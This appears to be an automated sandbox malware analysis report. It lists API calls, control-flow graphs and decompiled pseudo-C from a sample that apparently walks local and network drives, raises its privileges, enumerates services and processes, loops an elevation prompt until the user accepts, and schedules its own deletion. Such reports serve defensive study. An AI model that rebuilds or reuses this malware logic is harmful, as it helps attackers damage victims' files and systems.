            0x009b2b65
            0x009b2b68
            0x00000000
            0x009b29ca
            0x009b29dc
            0x009b29e1
            0x009b29e9
            0x009b29ed
            0x009b29f0
            0x009b29f1
            0x009b29f9
            0x009b29fa
            0x009b29fb
            0x009b29fc
            0x009b29fd
            0x009b29fe
            0x009b29ff
            0x009b2a05
            0x00000000
            0x00000000
            0x009b2a16
            0x009b2a1e
            0x00000000
            0x00000000
            0x009b2a27
            0x009b2a3a
            0x009b2a41
            0x009b2a56
            0x009b2a5b
            0x009b2a63
            0x009b2a6a
            0x009b2a6d
            0x009b2a6e
            0x009b2a6f
            0x009b2a79
            0x009b2a7d
            0x009b2a7e
            0x009b2a84
            0x00000000
            0x00000000
            0x009b2b3e
            0x009b2b3e
            0x009b2b48
            0x009b2b53
            0x009b2b59
            0x00000000
            0x00000000
            0x009b2a8f
            0x009b2a95
            0x009b2a96
            0x009b2a97
            0x009b2a9a
            0x009b2a9b
            0x009b2aa0
            0x009b2aa6
            0x009b2ac0
            0x009b2ad6
            0x009b2ae0
            0x009b2af2
            0x009b2af8
            0x009b2afd
            0x009b2aff
            0x009b2b11
            0x009b2b21
            0x009b2b26
            0x009b2b26
            0x009b2b2d
            0x009b2b2d
            0x009b2b2f
            0x009b2b35
            0x009b2b3c
            0x009b2b3c
            0x00000000
            0x009b2b3e
            0x009b29c4
            0x009b2960
            0x00000000
            0x009b2960
            0x00000000

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$__ProviderArchitecture
            • API String ID: 0-691293667
            • Opcode ID: 893510f9c35d3b6bbd93219a52692cd2d9e15c23ec7f75d08e0bb37803f8a9cd
            • Instruction ID: 5bd19938cd482f6b493ff32cf6f982ba9ea9aba2d43ed94cb6242f82a51699cf
            • Opcode Fuzzy Hash: 893510f9c35d3b6bbd93219a52692cd2d9e15c23ec7f75d08e0bb37803f8a9cd
            • Instruction Fuzzy Hash: 69616E71A00219BBEB10DBA1CD49FEFBBBCEF89B14F004459F605EB191E6709A45CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 139 9b32a6-9b32bc 140 9b335f-9b3392 call 9b74df 139->140 141 9b32c2-9b32d0 call 9b4c10 139->141 147 9b32d2-9b32d4 140->147 148 9b3398-9b33d2 140->148 146 9b32d9-9b32dd 141->146 141->147 150 9b32df-9b32e7 call 9b4c02 146->150 151 9b32ec-9b330a 146->151 149 9b355a-9b3560 147->149 152 9b33d8-9b33ee call 9b5162 PathRemoveBackslashW PathIsDirectoryW 148->152 153 9b34c3-9b34c9 148->153 166 9b3559 150->166 155 9b330c-9b3314 151->155 156 9b3316-9b3325 call 9b494c 151->156 172 9b340e-9b3416 PathIsNetworkPathW 152->172 173 9b33f0-9b3409 PathAddBackslashW call 9b766a call 9b4999 152->173 157 9b34cb-9b34cf call 9b79c5 153->157 158 9b34d5-9b34db 153->158 155->147 155->156 156->150 181 9b3327-9b334d call 9b61f8 call 9b4c02 call 9b62a1 156->181 169 9b34d4 157->169 163 9b351b-9b3523 158->163 164 9b34dd-9b3513 call 9b7a73 * 5 158->164 167 9b3545-9b354e call 9b7430 163->167 168 9b3525 163->168 213 9b3518 164->213 166->149 184 9b3553-9b3556 167->184 179 9b353b-9b3543 168->179 180 9b3527-9b3537 call 9b575c 168->180 169->158 177 9b34bc-9b34c1 RevertToSelf 172->177 178 9b341c-9b3435 172->178 173->177 177->163 178->147 195 9b343b-9b345c PathAddBackslashW call 9b494c 178->195 179->167 179->180 196 9b3539 180->196 181->140 207 9b334f-9b3352 181->207 184->166 205 9b345e-9b3465 195->205 206 9b34b3 195->206 196->167 196->179 209 9b34a8-9b34b1 205->209 210 9b3467-9b34a5 call 9b6116 PathAddBackslashW call 9b6116 PathAddBackslashW call 9b766a call 9b49d3 205->210 206->177 211 9b335b 207->211 212 9b3354-9b3359 207->212 209->205 209->206 210->209 211->140 212->140 213->163
            C-Code - Quality: 87%
            			E009B32A6() {
            				WCHAR* _v8;
            				intOrPtr _v12;
            				void* _v16;
            				char _v20;
            				char _v24;
            				char _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				WCHAR* _v48;
            				WCHAR* _v52;
            				WCHAR* _v56;
            				WCHAR* _v60;
            				char* _v68;
            				WCHAR* _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				char _v84;
            				WCHAR* _t52;
            				intOrPtr _t55;
            				void* _t57;
            				WCHAR* _t73;
            				WCHAR* _t74;
            				WCHAR* _t79;
            				WCHAR* _t81;
            				intOrPtr _t82;
            				intOrPtr _t97;
            				signed int _t103;
            				intOrPtr* _t105;
            				signed int _t106;
            				WCHAR* _t113;
            				WCHAR* _t119;
            				void* _t122;
            				short _t123;
            				void* _t125;
            				WCHAR* _t126;
            				WCHAR* _t129;
            				void* _t130;
            				void* _t131;
            				WCHAR* _t134;
            
            				_t125 = 1;
            				_t129 = 0;
            				_t134 =  *0x9c230c; // 0x0
            				if(_t134 == 0) {
            					L12:
            					 *0x9c1d88 = 0;
            					 *0x9c1d8c = 0;
            					 *0x9c1d90 = 0;
            					 *0x9c1d94 = 0;
            					 *0x9c1d84 = 0; // executed
            					_t52 = E009B74DF(__eflags,  &_v36, 0, 0, E009B3561); // executed
            					_t131 = _t130 + 0x10;
            					__eflags = _t52;
            					if(_t52 == 0) {
            						L2:
            						return 0;
            					}
            					_v84 = 0;
            					_v80 = E009B2D36;
            					_v76 = E009B390F;
            					_v72 = 0;
            					_v68 =  &_v36;
            					_v60 = 0;
            					_v56 = 0;
            					_v52 = 0;
            					_v48 = 0;
            					_v44 = E009B2D02;
            					_v40 = E009B38A7;
            					__eflags =  *0x9c230c; // 0x0
            					if(__eflags == 0) {
            						__eflags =  *0x9c2308; // 0x1
            						if(__eflags != 0) {
            							E009B79C5( &_v84); // executed
            						}
            						__eflags =  *0x9c2304; // 0x1
            						if(__eflags != 0) {
            							E009B7A73( &_v84, _t125, 0); // executed
            							E009B7A73( &_v84, 4, 0); // executed
            							E009B7A73( &_v84, 5, 0); // executed
            							E009B7A73( &_v84, 3, 0); // executed
            							E009B7A73( &_v84, 2, 0); // executed
            						}
            						L28:
            						_t55 =  *0x9c1d94; // 0x0
            						__eflags = _t55 - _v48;
            						if(__eflags > 0) {
            							L33:
            							E009B7430( &_v36, 0x9c1d84); // executed
            							__eflags = 0;
            							_t57 = 1;
            							L34:
            							return _t57;
            						}
            						if(__eflags >= 0) {
            							L32:
            							_t55 =  *0x9c1d90; // 0x8a
            							__eflags = _t55 - _v52;
            							if(_t55 < _v52) {
            								do {
            									goto L30;
            								} while (__eflags < 0);
            								if(__eflags > 0) {
            									goto L33;
            								}
            								goto L32;
            							}
            							goto L33;
            						}
            						L30:
            						E009B575C(_t55, 0x64);
            						_t55 =  *0x9c1d94; // 0x0
            						__eflags = _t55 - _v48;
            					}
            					E009B5162(_t106, __eflags);
            					PathRemoveBackslashW(_t129);
            					_t73 = PathIsDirectoryW(_t129);
            					_push(_t129);
            					__eflags = _t73;
            					if(_t73 == 0) {
            						_t74 = PathIsNetworkPathW();
            						__eflags = _t74;
            						if(_t74 == 0) {
            							L23:
            							RevertToSelf();
            							goto L28;
            						}
            						_t79 =  *0x9c119c(_t129, _t125,  &_v16, 0xffffffff,  &_v8,  &_v24, 0);
            						__eflags = _t79;
            						if(_t79 != 0) {
            							goto L2;
            						}
            						PathAddBackslashW(_t129);
            						_t105 = _v16;
            						_t81 = E009B494C(0x800);
            						_t113 = _v8;
            						_t126 = _t81;
            						_t82 = 0;
            						_v12 = 0;
            						__eflags = _t113;
            						if(_t113 == 0) {
            							L22:
            							 *0x9c116c(_v16);
            							goto L23;
            						} else {
            							goto L19;
            						}
            						do {
            							L19:
            							__eflags =  *(_t105 + 4) & 0x80000003;
            							if(__eflags == 0) {
            								E009B6116(__eflags, _t126, _t129);
            								PathAddBackslashW(_t126);
            								E009B6116(__eflags, _t126,  *_t105);
            								PathAddBackslashW(_t126);
            								E009B766A(_t126,  &_v84);
            								E009B49D3(_t126, 0, 0x800);
            								_t113 = _v8;
            								_t131 = _t131 + 0x14;
            								_t82 = _v12;
            							}
            							_t82 = _t82 + 1;
            							_t105 = _t105 + 0xc;
            							_v12 = _t82;
            							__eflags = _t82 - _t113;
            						} while (_t82 < _t113);
            						goto L22;
            					}
            					PathAddBackslashW();
            					E009B766A(_t129,  &_v84);
            					E009B4999(_t129);
            					goto L23;
            				}
            				_t127 = E009B4C10( &_v20);
            				if(_t96 != 0) {
            					__eflags = _v20 - 2;
            					if(_v20 > 2) {
            						_t119 =  *0x9c22fc; // 0x0
            						__eflags = _t119;
            						_t97 =  *0x9c22d8; // 0x0
            						_t122 = 1;
            						_t98 =  !=  ? _t122 : _t97;
            						 *0x9c22d8 =  !=  ? _t122 : _t97;
            						__eflags =  *0x9c2300; // 0x0
            						if(__eflags == 0) {
            							L7:
            							_t129 = E009B494C(0x208);
            							__eflags = _t129;
            							if(_t129 == 0) {
            								goto L4;
            							}
            							E009B61F8(_t129,  *((intOrPtr*)(_t127 + 8)));
            							E009B4C02(_t127);
            							_t103 = E009B62A1(_t129);
            							_t130 = _t130 + 0x10;
            							_t125 = 1;
            							_t106 =  *(_t129 + _t103 * 2 - 2) & 0x0000ffff;
            							_t123 = 0x5c;
            							__eflags = _t106 - _t123;
            							if(__eflags != 0) {
            								__eflags = _t106 - 0x22;
            								if(__eflags != 0) {
            									_t129[_t103] = _t123;
            								} else {
            									 *(_t129 + _t103 * 2 - 2) = _t123;
            								}
            							}
            							goto L12;
            						}
            						 *0x9c22d8 = 0;
            						__eflags = _t119;
            						if(_t119 != 0) {
            							goto L2;
            						}
            						goto L7;
            					}
            					L4:
            					E009B4C02(_t127);
            					_t57 = 0;
            					goto L34;
            				}
            				goto L2;
            			}
            0x009b32b3
            0x009b32b4
            0x009b32b6
            0x009b32bc
            0x009b335f
            0x009b3368
            0x009b3370
            0x009b3376
            0x009b337c
            0x009b3382
            0x009b3388
            0x009b338d
            0x009b3390
            0x009b3392
            0x009b32d2
            0x00000000
            0x009b32d2
            0x009b339b
            0x009b339e
            0x009b33a5
            0x009b33ac
            0x009b33af
            0x009b33b2
            0x009b33b5
            0x009b33b8
            0x009b33bb
            0x009b33be
            0x009b33c5
            0x009b33cc
            0x009b33d2
            0x009b34c3
            0x009b34c9
            0x009b34cf
            0x009b34d4
            0x009b34d5
            0x009b34db
            0x009b34e3
            0x009b34ef
            0x009b34fb
            0x009b3507
            0x009b3513
            0x009b3518
            0x009b351b
            0x009b351b
            0x009b3520
            0x009b3523
            0x009b3545
            0x009b354e
            0x009b3553
            0x009b3556
            0x009b3559
            0x00000000
            0x009b3559
            0x009b3525
            0x009b353b
            0x009b353b
            0x009b3540
            0x009b3543
            0x009b3527
            0x00000000
            0x00000000
            0x009b3539
            0x00000000
            0x00000000
            0x00000000
            0x009b3539
            0x00000000
            0x009b3543
            0x009b3527
            0x009b3529
            0x009b352e
            0x009b3534
            0x009b3534
            0x009b33d8
            0x009b33de
            0x009b33e5
            0x009b33eb
            0x009b33ec
            0x009b33ee
            0x009b340e
            0x009b3414
            0x009b3416
            0x009b34bc
            0x009b34bc
            0x00000000
            0x009b34bc
            0x009b342d
            0x009b3433
            0x009b3435
            0x00000000
            0x00000000
            0x009b343c
            0x009b3442
            0x009b344a
            0x009b3450
            0x009b3453
            0x009b3455
            0x009b3457
            0x009b345a
            0x009b345c
            0x009b34b3
            0x009b34b6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009b345e
            0x009b345e
            0x009b345e
            0x009b3465
            0x009b3469
            0x009b3471
            0x009b347a
            0x009b3482
            0x009b348d
            0x009b349a
            0x009b349f
            0x009b34a2
            0x009b34a5
            0x009b34a5
            0x009b34a8
            0x009b34a9
            0x009b34ac
            0x009b34af
            0x009b34af
            0x00000000
            0x009b345e
            0x009b33f0
            0x009b33fb
            0x009b3401
            0x00000000
            0x009b3406
            0x009b32cb
            0x009b32d0
            0x009b32d9
            0x009b32dd
            0x009b32ec
            0x009b32f2
            0x009b32f4
            0x009b32fb
            0x009b32fc
            0x009b32ff
            0x009b3304
            0x009b330a
            0x009b3316
            0x009b3320
            0x009b3323
            0x009b3325
            0x00000000
            0x00000000
            0x009b332b
            0x009b3331
            0x009b3337
            0x009b333c
            0x009b3341
            0x009b3342
            0x009b3349
            0x009b334a
            0x009b334d
            0x009b334f
            0x009b3352
            0x009b335b
            0x009b3354
            0x009b3354
            0x009b3354
            0x009b3352
            0x00000000
            0x009b334d
            0x009b330c
            0x009b3312
            0x009b3314
            0x00000000
            0x00000000
            0x00000000
            0x009b3314
            0x009b32df
            0x009b32e0
            0x009b32e5
            0x00000000
            0x009b32e5
            0x00000000

            APIs
            • PathRemoveBackslashW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 009B33DE
            • PathIsDirectoryW.SHLWAPI(00000000), ref: 009B33E5
            • PathAddBackslashW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 009B33F0
            • RevertToSelf.ADVAPI32(?,?,00000000,00000000), ref: 009B34BC
              • Part of subcall function 009B4C10: GetCommandLineW.KERNEL32(0000000E,?,009B13D7,?,00000010,009C0270,?,?,009B1B06,?,009C0270,000002DF,0000000F,0000000E,?), ref: 009B4C16
              • Part of subcall function 009B4C10: CommandLineToArgvW.SHELL32(00000000,?,009B13D7,?,00000010,009C0270,?,?,009B1B06,?,009C0270,000002DF,0000000F,0000000E,?), ref: 009B4C1D
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Path$BackslashCommandLine$ArgvDirectoryRemoveRevertSelf
            • String ID:
            • API String ID: 332453508-0
            • Opcode ID: 5e148bd27f3ccf9e0a98f87db1de86940834b66f6490decd861e12d8175c87d9
            • Instruction ID: ffd1c0825d283ebcd5e224c2fdf2c4602b322172373d5e02cabae57f2771f595
            • Opcode Fuzzy Hash: 5e148bd27f3ccf9e0a98f87db1de86940834b66f6490decd861e12d8175c87d9
            • Instruction Fuzzy Hash: E671E271D08204ABDB11EFE5DE81EEEB7BCFF85720F54802EF505A2152EB749A019B24
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 222 9b395d-9b3973 224 9b397d-9b3990 222->224 225 9b3975-9b3978 222->225 228 9b399a-9b39b9 224->228 229 9b3992-9b3998 224->229 226 9b3b67-9b3b6b 225->226 232 9b39bb-9b39c3 228->232 233 9b39c8-9b3a17 call 9b5e33 SysAllocString SysFreeString 228->233 229->225 237 9b3b66 232->237 239 9b3a19-9b3a2a 233->239 240 9b3a2f-9b3ae9 call 9b5e33 * 2 SysAllocString * 2 233->240 237->226 245 9b3b65 239->245 252 9b3aed-9b3aff SysFreeString * 2 240->252 245->237 253 9b3b01-9b3b04 252->253 254 9b3b06-9b3b20 GetCurrentProcess WaitForSingleObject 252->254 255 9b3b22-9b3b63 253->255 254->255 255->245
            C-Code - Quality: 41%
            			E009B395D() {
            				void* _v8;
            				void* _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				short _v26;
            				char _v32;
            				short _v36;
            				char _v56;
            				short _v58;
            				char _v232;
            				void* _t45;
            				void* _t46;
            				void* _t48;
            				void* _t53;
            				void* _t55;
            				intOrPtr _t59;
            				intOrPtr* _t61;
            				intOrPtr* _t63;
            				void* _t74;
            				void* _t75;
            				intOrPtr* _t80;
            				intOrPtr* _t82;
            				intOrPtr* _t84;
            				intOrPtr* _t86;
            				intOrPtr* _t88;
            				void* _t93;
            				intOrPtr* _t94;
            				void* _t101;
            				void* _t105;
            				intOrPtr* _t107;
            				intOrPtr* _t110;
            				intOrPtr _t116;
            				intOrPtr* _t117;
            				void* _t124;
            				void* _t125;
            				void* _t127;
            				void* _t133;
            
            				_t45 =  *0x9c12c0(0, 0); // executed
            				if(_t45 >= 0) {
            					_t46 =  *0x9c10fc(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0); // executed
            					if(_t46 >= 0) {
            						_v12 = 0;
            						_t48 =  *0x9c1320(0x9bd114, 0, 1, 0x9bd134,  &_v12, _t101); // executed
            						if(_t48 >= 0) {
            							_v8 = 0;
            							E009B5E33(0x9c0270, 0x24a, 0xe, 0x14,  &_v56);
            							_v36 = 0;
            							_t53 =  *0x9c12a4( &_v56, _t124);
            							_t107 = _v12;
            							_t125 = _t53;
            							_t55 =  *((intOrPtr*)( *_t107 + 0xc))(_t107, _t125, 0, 0, 0, 0, 0, 0,  &_v8);
            							 *0x9c1268(_t125);
            							if(_t55 >= 0) {
            								_v20 = 0;
            								 *0x9c1320(0x9bd124, 0, 4, 0x9bd0d4,  &_v20);
            								_t59 =  *0x9c0054; // 0x9c0040
            								 *((intOrPtr*)(_t59 + 4))(0x9c0054);
            								_t61 = _v20;
            								_v24 = 0;
            								 *((intOrPtr*)( *_t61 + 0xc))(_t61, 0x9c0054,  &_v24);
            								_t63 = _v24;
            								_v16 = 0;
            								 *((intOrPtr*)( *_t63))(_t63, 0x9bd0c4,  &_v16);
            								E009B5E33(0x9c0270, 0xc4, 0xe, 6,  &_v32);
            								_v26 = 0;
            								E009B5E33(0x9c0270, 0xa86, 0xd, 0xae,  &_v232);
            								_v58 = 0;
            								_t105 =  *0x9c12a4( &_v32);
            								_t74 =  *0x9c12a4( &_v232);
            								_t110 = _v8;
            								_t127 = _t74;
            								_t75 =  *((intOrPtr*)( *_t110 + 0x5c))(_t110, _t105, _t127, 0x80, 0, _v16);
            								 *0x9c1268(_t105);
            								 *0x9c1268(_t127);
            								if(_t75 >= 0) {
            									WaitForSingleObject(GetCurrentProcess(), 0xffffffff);
            									_t80 = _v8;
            									 *((intOrPtr*)( *_t80 + 0x10))(_t80, _v16);
            									_t133 = 0;
            								} else {
            									_t133 = 1;
            								}
            								_t82 = _v8;
            								 *((intOrPtr*)( *_t82 + 8))(_t82);
            								_t84 = _v12;
            								 *((intOrPtr*)( *_t84 + 8))(_t84);
            								_t86 = _v20;
            								 *((intOrPtr*)( *_t86 + 8))(_t86);
            								_t88 = _v24;
            								 *((intOrPtr*)( *_t88 + 8))(_t88);
            								_t116 =  *0x9c0054; // 0x9c0040
            								 *((intOrPtr*)(_t116 + 8))(0x9c0054);
            								_t117 = _v16;
            								 *((intOrPtr*)( *_t117 + 8))(_t117);
            								 *0x9c12d4();
            								_t93 = _t133;
            							} else {
            								_t94 = _v12;
            								 *((intOrPtr*)( *_t94 + 8))(_t94);
            								 *0x9c12d4();
            								_t93 = 1;
            							}
            						} else {
            							 *0x9c12d4();
            							_t93 = 1;
            						}
            						return _t93;
            					}
            					 *0x9c12d4();
            				}
            				return 1;
            			}

            APIs
            • SysAllocString.OLEAUT32(?), ref: 009B39F0
            • SysFreeString.OLEAUT32(00000000), ref: 009B3A0F
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: ea26d9e5883599612d9133f1307954d72319702e5525d6ee7a14e3e627de3f1f
            • Instruction ID: d6d3bd48df5097d9420133e7f477c4a720b1085f968a40f7d63d3455b0d5e74d
            • Opcode Fuzzy Hash: ea26d9e5883599612d9133f1307954d72319702e5525d6ee7a14e3e627de3f1f
            • Instruction Fuzzy Hash: 44618A35A04219BFCB10DBA4CD88EEFBBBCEF4A724F104159F515E7291DA709A01DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 67%
            			E009B37A8(void* __edi) {
            				char _v5;
            				char _v12;
            				void* __ebx;
            				void* __ecx;
            				void* _t11;
            				WCHAR* _t16;
            				void* _t20;
            				void* _t24;
            				void* _t26;
            				void* _t29;
            				void* _t34;
            				WCHAR* _t35;
            				intOrPtr* _t37;
            				intOrPtr _t39;
            				intOrPtr _t41;
            				intOrPtr _t42;
            				intOrPtr _t43;
            
            				 *0x9c1090(0x80000001, _t34, _t26, _t29, _t29);
            				E009B2B79(__edi);
            				_v5 = 0;
            				RtlAdjustPrivilege(0x14, 1, 0,  &_v5);
            				_t39 =  *0x9c2310; // 0x1
            				if(_t39 != 0) {
            					_t20 = CreateThread(0, 0, E009B395D, 0, 0, 0); // executed
            					E009B4BEE(_t20); // executed
            					E009B3B6E(); // executed
            					 *_t37 = E009B2C30;
            					_push(0);
            					_push(0); // executed
            					E009B5425(); // executed
            					_t37 = _t37 + 0xc;
            					_t24 = CreateThread(0, 0, E009B2923, 0, 0, 0); // executed
            					E009B4BEE(_t24); // executed
            					_pop(_t29);
            				}
            				RtlAdjustPrivilege(9, 1, 0,  &_v5); // executed
            				_t11 = E009B32A6(); // executed
            				if(_t11 != 0) {
            					_t41 =  *0x9c230c; // 0x0
            					if(_t41 == 0) {
            						E009B46DE();
            						_t42 =  *0x9c230c; // 0x0
            						if(_t42 == 0) {
            							_t43 =  *0x9c22f0; // 0x0
            							if(_t43 != 0) {
            								E009B5E55(_t29, _t43,  *0x9c2258, 0x3b, 0, E009B2C57);
            							}
            						}
            					}
            				}
            				E009B1415(0); // executed
            				RevertToSelf(); // executed
            				 *0x9c1090(0x80000000);
            				_t16 = E009B4F8D(0,  &_v12);
            				_t35 = _t16;
            				if(_t35 != 0) {
            					MoveFileExW(_t35, 0, 4); // executed
            					_t16 = E009B4999(_t35);
            				}
            				return _t16;
            			}

            APIs
            • SetThreadExecutionState.KERNEL32(80000001), ref: 009B37B4
            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 009B37CD
            • CreateThread.KERNELBASE(00000000,00000000,009B395D,00000000,00000000,00000000), ref: 009B37E5
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
              • Part of subcall function 009B3B6E: OpenSCManagerW.SECHOST(00000000,ServicesActive,00000004,00000000,00000000), ref: 009B3B80
              • Part of subcall function 009B5425: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009B5435
            • CreateThread.KERNELBASE(00000000,00000000,009B2923,00000000,00000000,00000000), ref: 009B3811
            • RtlAdjustPrivilege.NTDLL(00000009,00000001,00000000,?), ref: 009B3827
            • RevertToSelf.ADVAPI32(?,00000600,00000600,?,009B4409,?,009B441B,00000000), ref: 009B386E
            • SetThreadExecutionState.KERNEL32(80000000), ref: 009B3878
            • MoveFileExW.KERNELBASE(00000000,00000000,00000004,?,00000600,00000600,?,009B4409,?,009B441B,00000000), ref: 009B3894
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Thread$Create$AdjustExecutionPrivilegeState$ChangeCloseFileFindManagerMoveNotificationOpenRevertSelfSnapshotToolhelp32
            • String ID:
            • API String ID: 865017910-0
            • Opcode ID: 95348c11aa5627f93c043374b2818d5403a0354696e03dd335aa1d923962aa36
            • Instruction ID: 9e59081e826106cbf7bba052de5b356c5da2fe4959778c622cda567c633592f1
            • Opcode Fuzzy Hash: 95348c11aa5627f93c043374b2818d5403a0354696e03dd335aa1d923962aa36
            • Instruction Fuzzy Hash: 7A2196B1858318BFE710BBA0AE86FFF375CDB417A9F008429F60195093DA754E4496B6
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E009B5982(void* __ebx, void* __edi) {
            				char _v8;
            				short _v10;
            				char _v20;
            				struct _SHELLEXECUTEINFOW _v80;
            				void* __esi;
            				void* _t22;
            				void* _t46;
            				intOrPtr _t47;
            
            				_t46 = GetCurrentProcess();
            				_t22 = E009B5408();
            				if(_t22 >= 0x600) {
            					_t22 = E009B4DB2(_t46); // executed
            					if(_t22 == 3) {
            						_t22 = E009B4EBA(_t46, _t46);
            						if(_t22 < 0x3000) {
            							E009B56F7();
            							_t47 = E009B4F8D(0,  &_v8);
            							if(_t47 != 0) {
            								_t45 = E009B5359();
            								E009B5E33(0x9c1338, 0x66e, 6, 0xa,  &_v20);
            								_v80.cbSize = 0x3c;
            								_v80.fMask = 0;
            								_v10 = 0;
            								_v80.hwnd = GetForegroundWindow();
            								_v80.lpVerb =  &_v20;
            								_v80.lpFile = _t47;
            								_v80.lpParameters = _t26;
            								_v80.lpDirectory = 0;
            								_v80.nShow = 1;
            								_v80.hInstApp = 0;
            								_v80.lpIDList = 0;
            								_v80.lpClass = 0;
            								_v80.hkeyClass = 0;
            								_v80.dwHotKey = 0;
            								_v80.hIcon = 0;
            								_v80.hProcess = 0;
            								do {
            								} while (ShellExecuteExW( &_v80) == 0);
            								E009B4999(_t47);
            								_t22 = E009B4999(_t45);
            								ExitProcess(0);
            							}
            							ExitProcess(0);
            						}
            					}
            				}
            				return _t22;
            			}

            APIs
            • GetCurrentProcess.KERNEL32(00000000), ref: 009B5989
              • Part of subcall function 009B4DB2: OpenProcessToken.ADVAPI32(009B59AA,00000008,009B59AA,?,009B59AA), ref: 009B4DC5
              • Part of subcall function 009B4DB2: GetTokenInformation.KERNELBASE(009B59AA,00000012(TokenIntegrityLevel),00000000,00000004,?,?,009B59AA), ref: 009B4DDE
              • Part of subcall function 009B4EBA: OpenProcessToken.ADVAPI32(009B59BA,00000008,00000000), ref: 009B4ECC
              • Part of subcall function 009B4EBA: GetTokenInformation.ADVAPI32(00000000,00000019(TokenIntegrityLevel),?,0000004C,009B59BA), ref: 009B4EE5
              • Part of subcall function 009B4EBA: IsValidSid.ADVAPI32(?,00000000), ref: 009B4EF4
              • Part of subcall function 009B56F7: ReleaseMutex.KERNEL32(009B59CD), ref: 009B56FD
              • Part of subcall function 009B4F8D: GetModuleFileNameW.KERNEL32(?,00000000,00000106,?,?,00000000,?,009B2B98,00000000,?,00000000), ref: 009B4FB1
            • ExitProcess.KERNEL32 ref: 009B59E2
            • GetForegroundWindow.USER32 ref: 009B5A19
            • ShellExecuteExW.SHELL32(0000003C), ref: 009B5A51
            • ExitProcess.KERNEL32 ref: 009B5A6A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Process$Token$ExitInformationOpen$CurrentExecuteFileForegroundModuleMutexNameReleaseShellValidWindow
            • String ID: <
            • API String ID: 491521492-4251816714
            • Opcode ID: 5347c54fdc8f437ed2def149ad722702e5960ca2f28b93014f0e38fd07ff66db
            • Instruction ID: edb1a43b7441978e30040abf95b6fb51d91e37d6e7a282c69e98b2abebfbda78
            • Opcode Fuzzy Hash: 5347c54fdc8f437ed2def149ad722702e5960ca2f28b93014f0e38fd07ff66db
            • Instruction Fuzzy Hash: 36215EB1C00318ABDB10EFB59985BEEBBB8FF49320F51012EE405F6242EB7489418B65
            Uniqueness

